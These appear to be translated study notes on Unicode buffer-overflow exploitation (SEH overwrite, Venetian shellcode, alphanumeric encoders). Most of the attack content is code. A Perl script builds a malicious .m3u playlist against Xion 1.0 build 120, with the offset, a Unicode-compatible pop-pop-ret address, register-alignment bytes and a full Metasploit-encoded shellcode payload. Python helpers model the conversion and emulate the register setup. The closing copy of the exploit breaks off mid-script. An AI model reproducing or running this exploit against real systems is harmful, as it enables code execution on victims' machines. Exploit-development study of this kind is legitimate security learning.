• Unicode exploit study notes



    The Unicode conversion automatically inserts a NULL byte after every input byte.

    1) Overwriting RET

    Look for a jmp xxx sitting at an address of the form 0x00nn00mm; it can jump into the shellcode for execution.


    2) SEH-based: control EIP + short jmp

    Look for a pop pop ret whose address contains no byte > 0x7f, and use it to overwrite the SEH handler.

    First set nSEH to \xcc\xcc, then go looking for a two-byte short jmp.


    3) SEH-based jmp

    Instead of a short jmp, overwrite nSEH with harmless code so that execution can proceed past the overwritten SEH record,

    then place the code to be executed right after the overwritten SEH record, so that once nSEH + SEH have been stepped over our code runs.

    This requires the following:

    (1) a harmless instruction placed in nSEH; (2) a "unicode compatible" address used to overwrite the SEH handler, one that does no harm when executed.

    When an ASCII byte is > 0x7f, the Unicode conversion turns it into a completely different value, e.g. 0x80 -> 1a20, which can be built into 0x00nn1a20.
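    As an added illustration of the conversion rule above (not code from these notes or from any tool they mention), the following Python models the ANSI -> UTF-16LE expansion and applies the 0x00nn00mm test to candidate addresses. It assumes the target process converts under the Windows-1252 code page (Python's cp1252), which is why 0x80..0x9f are the bytes that come out changed; the three accepted addresses it checks are the ones !pvefindaddr reports later in these notes, the rejected ones are constructed.

```python
"""Model the ANSI -> UTF-16LE conversion that a Unicode-aware Windows API applies to
attacker-controlled input, and check which bytes and addresses survive it.

Added example; not from the original notes or from any tool they mention.
Assumption: the target process uses the Windows-1252 ANSI code page (Python's cp1252),
so bytes 0x80..0x9f are the ones that come out as something else.
"""


def ansi_to_utf16le(data: bytes) -> bytes:
    """Expand each input byte the way MultiByteToWideChar(CP_ACP, ...) would under cp1252.

    Bytes < 0x80 and 0xa0..0xff become <byte> 0x00; bytes in 0x80..0x9f map to other
    code points (e.g. 0x82 -> U+201A -> 1a 20) and are lost for the exploit's purposes.
    """
    out = bytearray()
    for b in data:
        try:
            ch = bytes([b]).decode("cp1252")
        except UnicodeDecodeError:
            # Assumption: slots undefined in cp1252 (0x81, 0x8d, 0x8f, 0x90, 0x9d) map to
            # the code point with the same number, as Windows does.
            ch = chr(b)
        out += ch.encode("utf-16-le")
    return bytes(out)


def byte_survives(b: int) -> bool:
    """True when a single input byte comes out as exactly <b> 00."""
    return ansi_to_utf16le(bytes([b])) == bytes([b, 0])


def altered_bytes() -> list:
    """Every byte value the conversion changes; anything listed here is unusable in input."""
    return [b for b in range(256) if not byte_survives(b)]


def is_unicode_compatible_address(addr: int) -> bool:
    """The 0x00nn00mm rule from the notes: the little-endian bytes mm 00 nn 00 must be
    producible from two input bytes mm, nn that both survive the conversion."""
    le = addr.to_bytes(4, "little")
    return le[1] == 0 and le[3] == 0 and byte_survives(le[0]) and byte_survives(le[2])


def input_bytes_for_address(addr: int) -> bytes:
    """The two input bytes that expand to addr (the form used for the $seh overwrite)."""
    if not is_unicode_compatible_address(addr):
        raise ValueError(f"{addr:#010x} cannot be produced by the conversion")
    le = addr.to_bytes(4, "little")
    return bytes([le[0], le[2]])


if __name__ == "__main__":
    # The three candidates !pvefindaddr reported in the notes, plus two constructed rejects.
    for a in (0x00470034, 0x0043003B, 0x00480063, 0x00470082, 0x00474034):
        print(f"{a:#010x}: unicode compatible = {is_unicode_compatible_address(a)}")
    print("input bytes for 0x00470034:", input_bytes_for_address(0x00470034))
    print("altered bytes:", " ".join(f"{b:02x}" for b in altered_bytes()))
```

    Run it directly to list the altered byte values and the verdict for each address. A byte outside the altered list becomes <byte> 00 after conversion, which is exactly what the 0x6e pads and the register-setup sequences later in these notes rely on; a byte inside it (or a non-zero high byte in the address) makes the address unreachable through this input path.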


    ASCII shellcode -> Unicode shellcode:

    1) Find an equivalent ASCII copy and jump to it:

    After the ASCII input is loaded into memory it becomes Unicode; look for an ASCII version of the shellcode in memory, and if EIP can be controlled and made to jump to that address,

    the exploit may succeed. If it cannot be reached, control the contents of some register, jump to that register, and place a few jump instructions there that lead to the ASCII version of the shellcode.


    2) Write your own unicode-compatible shellcode


    3) Use an encoder

    Convert ASCII -> Unicode and put a decoder in front; after decoding, the original code is produced and executed.

    (1) Rebuild the original code at a specific memory address, then jump to that address.

    One register must point to the entry of decoder+shellcode, and another register must point to a writable memory address (where the shellcode is rebuilt).

    (2) Change the execution flow so that it runs onto the rebuilt shellcode.

    A single register pointing to the entry of decoder+shellcode suffices; the original shellcode is rebuilt in place and kept there.


    Tools:

    1) makeunicode2.py: I couldn't figure it out.

    2) vense.pl   download: http://www.phenoelit-us.org/win

    Generates a byte string containing decoder + original shellcode. To make use of the decoder, registers also have to be set up:

    one register points directly to the start of the buffer holding the shellcode generated by vense.pl; a second register must point to a writable, executable memory region that data can be written into.

    shellcode entry address = eax       writable address = edi


    Replace $secondstage with the Perl-format shellcode generated by Metasploit; after decoding it runs normally.


    Running the script shows 1) the original shellcode and 2) the newly generated shellcode, decoder included.

    Put the newly generated shellcode into the exploit and make sure eax -> shellcode entry address. !!! The registers have to be readjusted here, and the jump made with unicode-compatible code (the original linked to the method from here).

    Once the registers are set, run jmp eax: the decoder extracts the original shellcode and executes it.


    Notes:

    (1) It cannot be used in an exploit that is not a Unicode exploit. (2) Although the algorithm the script uses is the version improved by makeunicode2, it still produces very long shellcode, so a large buffer is required.


    3) alpha2   download: http://download.csdn.net/detail/hksoobe/4803452

    Also included in MSF; it wraps the shellcode in a decoder.

    (1) Only the register holding the shellcode entry address needs to be specified; no register pointing to a writable, executable address is required.

    (2) The decoder is not contained in the original code; it is self-modifying, and the buffer space required is smaller.

    The MSF copy was not downloaded, so it is not used here.

    root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin

    root@bt:~/Desktop# ./alpha2 --help
    Usage: ./alpha2 [OPTION] [BASEADDRESS]
    ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
    The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
    version of your origional shellcode. It consists of baseaddress-code with some
    padding, a decoder routine and the encoded origional shellcode. This will work
    for any target OS. The resulting shellcode needs to have RWE-access to modify
    it's own code and decode the origional shellcode in memory.
    
    BASEADDRESS
      The decoder routine needs have it's baseaddress in specified register(s). The
      baseaddress-code copies the baseaddress from the given register or stack
      location into the apropriate registers.
    eax, ecx, edx, ecx, esp, ebp, esi, edi
      Take the baseaddress from the given register. (Unicode baseaddress code using
      esp will overwrite the byte of memory pointed to by ebp!)
    [esp], [esp-X], [esp+X]
      Take the baseaddress from the stack.
    seh
      The windows "Structured Exception Handler" (seh) can be used to calculate
      the baseaddress automatically on win32 systems. This option is not available
      for unicode-proof shellcodes and the uppercase version isn't 100% reliable.
    nops
      No baseaddress-code, just padding.  If you need to get the baseaddress from a
      source not on the list use this option (combined with --nocompress) and
      replace the nops with your own code. The ascii decoder needs the baseaddress
      in registers ecx and edx, the unicode-proof decoder only in ecx.
    -n
      Do not output a trailing newline after the shellcode.
    --nocompress
      The baseaddress-code uses "dec"-instructions to lower the required padding
      length. The unicode-proof code will overwrite some bytes in front of the
      shellcode as a result. Use this option if you do not want the "dec"-s.
    --unicode
      Make shellcode unicode-proof. This means it will only work when it gets
      converted to unicode (inserting a '0' after each byte) before it gets
      executed.
    --uppercase
      Make shellcode 100% uppercase characters, uses a few more bytes then
      mixedcase shellcodes.
    --sources
      Output a list of BASEADDRESS options for the given combination of --uppercase
      and --unicode.
    --help
      Display this help and exit
    --version
      Output version information and exit
    
    See the source-files for further details and copying conditions. There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    Acknowledgements:
      Thanks to rix for his phrack article on aphanumeric shellcode.
      Thanks to obscou for his phrack article on unicode-proof shellcode.
      Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
    
    Report bugs to <skylined@edup.tudelft.nl>



    4) metasploit

    root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
    > ./msfencode -e x86/alpha_mixed -t raw | 
    > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
    [*] x86/alpha_mixed succeeded with size 454 (iteration=1)
    
    [*] x86/unicode_upper succeeded with size 1039 (iteration=1)
    
    my $buf = 
    "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
    "\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
    "\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
    "\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" . ... (omitted)
    

    1) Only a restricted instruction set is available.

    2) Avoid NULL bytes; the shellcode must still run correctly once the NULLs have been inserted.

    3) Machine-code alignment.


    The venetian shellcode technique

    Make sure the NULLs and the instructions end up correctly aligned.

    Single bytes that do not clobber registers or break instructions when converted to Unicode; if these are not enough, see http://phrack.org/issues/61/11.html#article

    00 6e 00:add byte ptr [esi],ch
    00 6f 00:add byte ptr [edi],ch
    00 70 00:add byte ptr [eax],ch
    00 71 00:add byte ptr [ecx],ch
    00 72 00:add byte ptr [edx],ch
    00 73 00:add byte ptr [ebx],ch
    00 62 00:add byte ptr [edx],ah
    00 6d 00:add byte ptr [ebp],ch



    1) Assume ESI points to a writable address.

    Assume the ASCII version of the shellcode lives at 0x33445566 and we want to write that address into eax. Perl script:

    my $align = "\xb8\x44\xaa";        #mov eax,0x0AA004400
    $align=$align."\x6e";        #nop/align nullbytes
    $align=$align."\x50";                   #push eax
    $align=$align."\x6e";        #nop/align nullbytes
    $align=$align."\x4c";                   #dec esp
    $align=$align."\x6e";        #nop/align nullbytes
    $align=$align."\x58";                   #pop eax                     ,eax=0x004400??
    $align=$align."\x6e";        #nop/align nullbytes
    $align=$align."\x05\x55\x33";      #add eax,33005500h  ,eax=0x334455??
    $align=$align."\x6e";        #nop/align nullbytes
    $align=$align."\xb0";                   #mov al,0
    #no alignment needed between these 2!
    $align=$align."\xb9\x66\xaa";      #mov ecx,AA006600h ,eax =0x33445500

    $align=$align."\xe8";                   #add al,ch                   ,eax =0x33445566

    #Now, when this ASCII input goes through the Unicode-converting program and the instructions above execute, EAX ends up holding 0x33445566

    #Next comes jmp eax

    $align=$align."\x6e";        #nop/align nullbytes

    !!! Note: there is a catch here: 0xc3 no longer comes out as 0xc3 after the Unicode conversion,

    so usually execution is simply allowed to run straight on into the shellcode.

    But http://bbs.pediy.com/showthread.php?t=126344

    says it may be possible to construct a c3:

    '\x72\xcb\x72'  #ret, converted into '\x72\x00\xc3\x85\x41\x00'


    2) Suppose ebp+0x100 is to be loaded into eax, after which we jump to EAX to run the code there; first write down the assembly:

    00401580 >    55            push ebp
    00401581      58            pop eax
    00401582      05 00140011   add eax,0x11001400
    00401587      2D 00130011   sub eax,0x11001300  EBP+0x100

    Build the code above with the venetian shellcode technique:

    \x6e                 #nop/align nullbytes

    \x55                 #push ebp

    \x6e                 #nop/align nullbytes

    \x58                 #pop eax

    \x6e                 #nop/align nullbytes

    \x05\x14\x11  #add eax,0x11001400

    \x6e                 #nop/align nullbytes

    \x2d\x13\x11  #sub eax,0x11001300

    \x6e                 #nop/align nullbytes
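    To check that both sequences above really leave eax where their comments say, here is an added Python emulator (not code from these notes, from Corelan, or from any tool named here). It expands each input byte to <byte> 0x00 as the conversion does, decodes only the opcodes the two sequences use, and records which instruction swallows each inserted NULL. The stack is pre-filled with 0xee so the stale byte picked up by the misaligned pop after dec esp is visible, which is what the mov al,0 step exists to clear; the frame pointer used for sequence 2 is a constructed value.

```python
"""Emulate the two Venetian register-setup sequences above after Unicode expansion.

Added example; not code from the original notes, Corelan, or any tool named here.
Each input byte is expanded to <byte> 0x00 (exact for bytes cp1252 maps to themselves,
i.e. not 0x80..0x9f); only the opcodes the sequences use are decoded, so the reader can
see which instruction absorbs each NULL and why the 'mov al,0' step is needed.
"""
import struct

STACK_SIZE = 0x2000


def unicode_expand(data: bytes) -> bytes:
    """Insert a 0x00 after every byte; refuse bytes that cp1252 would remap."""
    if any(0x80 <= b <= 0x9F for b in data):
        raise ValueError("bytes 0x80..0x9f do not survive the conversion 1:1")
    return b"".join(bytes([b, 0]) for b in data)


class MiniX86:
    def __init__(self, ebp=0):
        self.eax, self.ecx, self.ebp = 0, 0, ebp
        self.stack = bytearray(b"\xee" * STACK_SIZE)  # 0xee = never written; exposes a misaligned pop
        self.esp = STACK_SIZE // 2
        self.trace = []

    def run(self, code: bytes, leading_null: bool) -> int:
        """leading_null=True: the previous expanded byte left its trailing 0x00 in front
        of us (true after any 1-byte opcode), so the first 0x6e pad forms '00 6e 00' with it."""
        stream, ip = (b"\x00" if leading_null else b"") + code, 0
        while ip < len(stream):
            op = stream[ip]
            if op == 0x00:
                if ip == len(stream) - 1:
                    break  # lone trailing NULL: whatever is converted next absorbs it
                modrm = stream[ip + 1]
                mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
                if mod == 3 and reg == 5 and rm == 0:        # 00 e8: add al, ch
                    al = ((self.eax & 0xFF) + ((self.ecx >> 8) & 0xFF)) & 0xFF
                    self.eax = (self.eax & 0xFFFFFF00) | al
                    self.trace.append("add al, ch")
                    ip += 2
                elif mod == 1 and rm != 4:                   # 00 6e 00: add byte ptr [esi+0], ch
                    self.trace.append(f"add byte ptr [reg+disp8], r8 (pad, modrm {modrm:#x})")
                    ip += 3  # a store into memory the notes assume to be writable
                else:
                    raise NotImplementedError(f"unsupported modrm {modrm:#x} at {ip}")
            elif op in (0xB8, 0xB9):                         # mov eax / mov ecx, imm32
                dst = "eax" if op == 0xB8 else "ecx"
                setattr(self, dst, struct.unpack_from("<I", stream, ip + 1)[0])
                self.trace.append(f"mov {dst}, {getattr(self, dst):#x}")
                ip += 5
            elif op == 0xB0:                                 # mov al, imm8
                self.eax = (self.eax & 0xFFFFFF00) | stream[ip + 1]
                self.trace.append(f"mov al, {stream[ip + 1]:#x}")
                ip += 2
            elif op in (0x05, 0x2D):                         # add / sub eax, imm32
                imm = struct.unpack_from("<I", stream, ip + 1)[0]
                self.eax = (self.eax + imm if op == 0x05 else self.eax - imm) & 0xFFFFFFFF
                self.trace.append(f"{'add' if op == 0x05 else 'sub'} eax, {imm:#x}")
                ip += 5
            elif op in (0x50, 0x55):                         # push eax / push ebp
                src = "eax" if op == 0x50 else "ebp"
                self.esp -= 4
                struct.pack_into("<I", self.stack, self.esp, getattr(self, src) & 0xFFFFFFFF)
                self.trace.append(f"push {src}")
                ip += 1
            elif op == 0x58:                                 # pop eax (reads wherever esp points now)
                self.eax = struct.unpack_from("<I", self.stack, self.esp)[0]
                self.esp += 4
                self.trace.append(f"pop eax -> {self.eax:#010x}")
                ip += 1
            elif op == 0x4C:                                 # dec esp: misaligns the following pop
                self.esp -= 1
                self.trace.append("dec esp")
                ip += 1
            elif op == 0x70:                                 # jo rel8: OF is never set here, so it falls through
                self.trace.append(f"jo +{stream[ip + 1]:#x} (not taken)")
                ip += 2
            else:
                raise NotImplementedError(f"opcode {op:#x} at {ip} is outside this model")
        return self.eax


# Sequence 1) above: eax := 0x33445566 (the notes assume ESI points to writable memory).
SEQ_LOAD_EAX = (b"\xb8\x44\xaa" b"\x6e" b"\x50" b"\x6e" b"\x4c" b"\x6e" b"\x58" b"\x6e"
                b"\x05\x55\x33" b"\x6e" b"\xb0" b"\xb9\x66\xaa" b"\xe8" b"\x6e")
# Sequence 2) above: eax := ebp + 0x100.
SEQ_EBP_PLUS_100 = b"\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"


def run_sequence(seq: bytes, leading_null: bool, ebp: int = 0):
    """Expand seq as the Unicode conversion would, run it, and return (eax, trace)."""
    cpu = MiniX86(ebp=ebp)
    return cpu.run(unicode_expand(seq), leading_null), cpu.trace


if __name__ == "__main__":
    eax, trace = run_sequence(SEQ_LOAD_EAX, leading_null=False)
    print(f"sequence 1: eax = {eax:#010x}\n   " + "\n   ".join(trace))
    print(f"sequence 2: eax = {run_sequence(SEQ_EBP_PLUS_100, True, 0x0012FF70)[0]:#010x}")  # constructed ebp
```

    Sequence 1 runs with leading_null=False because it begins on a fresh opcode byte; sequence 2 begins with a 0x6e pad that needs the trailing NULL of whatever executed before it (the case after any one-byte opcode), so it runs with leading_null=True. The 0x70 (jo) branch is there because the same decoder shows why a run of \x70 bytes acts as padding: each expands to jo +0, which falls through. Removing the \xb0 byte from sequence 1 still decodes cleanly but leaves eax at 0x33445554, the stale 0xee from the misaligned pop having been added to ch instead of being cleared first.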



    Here is a worked example: Xion 1.0 build 120:



    The offset found by debugging with OD is 0x235


    Then

    !pvefindaddr p2

    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe

    Bytes > 0x7f cannot be used.

    0x00470034 is chosen here.


    The next one was worked out with WinDbg and does not count as a success yet: the shellcode only runs successfully under the debugger.

    my $file = "test.m3u";
    #my $junk = "A"x270;
    
    
    my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
    my $seh =  "\x34\x47";#"\x34\x47";pop pop ret
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    
    
    my $VenetianShellcode ="\x6e";
     $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
     $VenetianShellcode =$VenetianShellcode."\x6e";
    #229fe54 - 229fd76 = DE = 222  just need 111  cannot use push eax / ret: c3 is not converted correctly to c3
    
                             #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
    my $junk2  = "\x70"x111; #2)"\x70"   jo xxx   either 1) or 2) can serve as nops to align eax to the first byte of the shellcode
    #the buffer from here on is 1840 bits, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
    my $buf = 
    "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
    "\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
    "\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
    "\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
    "\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
    "\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
    "\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
    "\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
    "\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
    "\x34\x4a\x42\x43\x59\x5a\x42\x49\x49\x58\x4b\x5a\x39\x52" .
    "\x52\x4b\x44\x52\x39\x51\x39\x51\x39\x51\x39\x51\x39\x51" .
    "\x39\x51\x39\x50\x49\x51\x39\x51\x39\x51\x39\x50\x49\x51" .
    "\x33\x50\x43\x50\x43\x51\x33\x51\x33\x51\x33\x50\x37\x50" .
    "\x51\x50\x5a\x52\x4a\x51\x31\x50\x58\x52\x30\x50\x30\x51" .
    "\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x52\x31\x50" .
    "\x32\x51\x31\x51\x32\x50\x32\x50\x42\x51\x32\x50\x30\x51" .
    "\x32\x51\x32\x51\x31\x50\x42\x52\x38\x50\x50\x50\x38\x51" .
    "\x31\x51\x32\x43\x45\x50\x4a\x50\x49\x50\x49\x52\x4c\x50" .
    "\x58\x43\x38\x50\x4b\x50\x39\x51\x37\x54\x30\x50\x43\x50" .
    "\x30\x50\x45\x52\x30\x52\x31\x54\x30\x50\x4c\x51\x39\x50" .
    "\x4d\x50\x35\x52\x30\x50\x31\x52\x38\x51\x42\x51\x33\x52" .
    "\x34\x50\x4e\x52\x4b\x50\x50\x52\x32\x50\x56\x50\x50\x50" .
    "\x4c\x50\x4b\x52\x32\x52\x52\x52\x34\x50\x4c\x50\x4e\x52" .
    "\x4b\x52\x30\x51\x42\x50\x56\x43\x44\x50\x4c\x50\x4b\x50" .
    "\x50\x43\x42\x50\x51\x50\x38\x51\x46\x52\x4f\x50\x4d\x52" .
    "\x47\x50\x43\x43\x4a\x52\x36\x50\x46\x50\x56\x52\x31\x50" .
    "\x49\x52\x4f\x50\x56\x50\x51\x50\x4b\x52\x50\x50\x4c\x52" .
    "\x4c\x51\x35\x52\x4c\x50\x51\x52\x51\x50\x51\x52\x4c\x52" .
    "\x34\x51\x32\x51\x46\x50\x4c\x50\x45\x52\x50\x50\x4b\x52" .
    "\x51\x52\x38\x50\x4f\x50\x56\x52\x4d\x51\x33\x50\x31\x51" .
    "\x48\x51\x37\x50\x4d\x50\x32\x50\x5a\x52\x30\x52\x36\x50" .
    "\x32\x50\x52\x54\x37\x50\x4e\x52\x4b\x52\x31\x51\x32\x50" .
    "\x56\x52\x50\x50\x4c\x50\x4b\x50\x52\x43\x32\x51\x35\x52" .
    "\x4c\x51\x35\x52\x31\x50\x58\x50\x50\x50\x4c\x50\x4b\x50" .
    "\x43\x52\x50\x52\x31\x51\x58\x50\x4f\x52\x55\x50\x4b\x54" .
    "\x30\x52\x31\x43\x34\x51\x33\x52\x5a\x51\x46\x51\x51\x50" .
    "\x5a\x52\x50\x51\x46\x50\x30\x50\x4c\x50\x4b\x50\x43\x54" .
    "\x38\x50\x56\x43\x48\x50\x4e\x52\x4b\x50\x50\x50\x58\x50" .
    "\x51\x50\x30\x51\x37\x54\x31\x50\x4b\x51\x53\x51\x39\x52" .
    "\x53\x50\x47\x50\x4c\x50\x52\x43\x39\x50\x4c\x50\x4b\x51" .
    "\x35\x43\x34\x50\x4c\x50\x4b\x50\x47\x54\x31\x50\x5a\x54" .
    "\x36\x50\x45\x43\x31\x51\x39\x52\x4f\x50\x50\x50\x31\x50" .
    "\x4b\x52\x50\x50\x4c\x52\x4c\x50\x5a\x43\x31\x52\x38\x50" .
    "\x4f\x51\x44\x50\x4d\x51\x33\x50\x31\x52\x38\x50\x47\x50" .
    "\x47\x51\x38\x50\x4b\x50\x50\x52\x30\x43\x45\x50\x5a\x50" .
    "\x54\x50\x56\x43\x33\x50\x43\x50\x4d\x50\x58\x54\x38\x50" .
    "\x47\x50\x4b\x52\x31\x52\x4d\x51\x35\x43\x44\x52\x34\x50" .
    "\x35\x50\x5a\x50\x42\x51\x46\x50\x38\x50\x4e\x52\x4b\x52" .
    "\x36\x50\x38\x51\x46\x51\x34\x51\x37\x54\x31\x51\x4a\x54" .
    "\x33\x50\x50\x52\x46\x50\x4c\x50\x4b\x50\x54\x50\x4c\x52" .
    "\x30\x50\x4b\x50\x4e\x52\x4b\x50\x56\x50\x38\x51\x35\x50" .
    "\x4c\x50\x47\x52\x51\x51\x48\x50\x53\x50\x4e\x52\x4b\x50" .
    "\x47\x54\x34\x50\x4c\x50\x4b\x51\x46\x51\x51\x52\x38\x52" .
    "\x30\x50\x4f\x54\x39\x52\x30\x51\x34\x50\x47\x52\x34\x50" .
    "\x54\x43\x34\x50\x43\x52\x4b\x52\x31\x50\x4b\x50\x51\x54" .
    "\x31\x52\x30\x50\x59\x50\x50\x50\x5a\x51\x33\x43\x31\x51" .
    "\x39\x52\x4f\x50\x4b\x52\x30\x50\x50\x52\x38\x51\x33\x52" .
    "\x4f\x51\x42\x52\x5a\x50\x4e\x52\x4b\x50\x45\x50\x42\x51" .
    "\x48\x52\x4b\x50\x4e\x52\x46\x52\x31\x50\x4d\x52\x30\x51" .
    "\x5a\x51\x33\x50\x31\x50\x4c\x50\x4d\x50\x4e\x52\x45\x50" .
    "\x4e\x50\x59\x50\x47\x52\x50\x50\x45\x52\x30\x50\x45\x50" .
    "\x50\x50\x56\x50\x30\x50\x45\x50\x38\x52\x34\x54\x31\x50" .
    "\x4e\x52\x4b\x52\x32\x50\x4f\x50\x4c\x50\x47\x50\x4b\x50" .
    "\x4f\x50\x58\x50\x55\x50\x4d\x52\x4b\x51\x48\x52\x50\x50" .
    "\x4e\x50\x55\x50\x4e\x50\x42\x51\x42\x43\x46\x51\x33\x51" .
    "\x48\x51\x39\x50\x36\x50\x4d\x50\x45\x50\x4d\x52\x4d\x50" .
    "\x4f\x52\x4d\x50\x4b\x50";
    
    #junk 
    my $junk = 
    "\x4f\x50\x4b\x51\x55\x50\x45\x52" .
    "\x4c\x51\x33\x50\x36\x50\x51\x52\x4c\x52\x36\x51\x5a\x50" .
    "\x4f\x54\x30\x50\x4b\x50\x4b\x50\x4b\x52\x30\x52\x32\x52" .
    "\x35\x51\x37\x52\x55\x50\x4f\x50\x4b\x52\x31\x50\x57\x52" .
    "\x32\x50\x33\x50\x50\x43\x42\x50\x50\x52\x4f\x51\x42\x50" .
    "\x4a\x51\x35\x52\x30\x50\x56\x50\x33\x51\x39\x52\x4f\x51" .
    "\x39\x51\x35\x50\x45\x50\x33\x50\x51\x54\x31\x52\x30\x52" .
    "\x4c\x50\x43\x50\x53\x51\x35\x52\x30\x51\x31\x51\x31\x41" .
    "\x41";
    $junk = $junk."A"x(270-length($junk));
    
    my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
    
    my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
    open($FILE,">$file");
    print $FILE $payload;
    close($FILE);


    Encoding your own shellcode into shellcode that works in a Unicode exploit:

    root@bt:/opt/framework/msf3# cat exploit.m3u |   ./msfencode -e x86/alpha_mixed -t raw |    ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
    [*] x86/alpha_mixed succeeded with size 277 (iteration=1)
    
    
    [*] x86/unicode_upper succeeded with size 685 (iteration=1)
    
    
    my $buf = 
    "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" . ... (omitted)

    The one below is the correct PoC. The open question is: why do the PoCs worked out with WinDbg and with OD (which works) differ?

    And the PoC worked out with WinDbg is definitely wrong! The one from OD is the correct one.


    1)  Find a Unicode-form pop pop ret to overwrite the SEH handler; !pvefindaddr p2 can find one.

    2)  Use popad in nSEH to get register+offset pointing at some position inside the string we supplied.

    3)  Build the VenetianShellcode so that eax = some position inside our string.

    4)  Build nop/align bytes so that eax = the first byte of the shellcode.

    5)  Use the generated Unicode shellcode with eax = start of the shellcode and execute it; shellcode = decoder + code.

    my $file = "test.m3u";#perl
    #my $junk = "A"x270;
    
    
    my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
    my $seh =  "\x34\x47";#"\x34\x47";pop pop ret
    #Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    #Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
    
    
    my $VenetianShellcode ="\x6e";
     $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
     $VenetianShellcode =$VenetianShellcode."\x6e";
     $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
     $VenetianShellcode =$VenetianShellcode."\x6e";
